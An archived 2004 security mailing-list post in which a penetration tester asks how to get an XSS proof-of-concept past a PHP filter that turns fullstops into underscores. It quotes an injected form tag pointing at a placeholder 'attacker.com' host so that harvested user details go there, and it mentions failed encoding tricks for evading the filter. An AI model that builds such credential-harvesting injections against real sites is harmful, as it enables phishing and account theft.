Home page logo

webappsec logo WebApp Sec mailing list archives

Fullstop Substitution in XSS
From: "Calum Power" <enune () fribble net>
Date: Sat, 29 May 2004 14:49:29 +1000 (EST)

Hi all,

As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP
script that has this vuln is filtering fullstops (.) and replacing them
with underscores (_).
Now, I'm trying trying to write a Proof-of-Concept, in which a
(convincing) form would be outputted that could 'harvest' user details and
send them to an attacker's webserver.

My problem lies in the output of the form tags. Any: <form
target="http://attacker.com/path/to/script";> is of course being filtered
into: <form target="http://attacker_com/path/to/script";>

Has anyone else had a similar problem? I've tried using hex and unicode
encoding, to no avail (they get decoded before the filtering, obviously).

Any help would be appreciated.

Calum Power
Cultural Jammer
Security Enthusiast
Hopeless Cynic

enune () fribble net

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]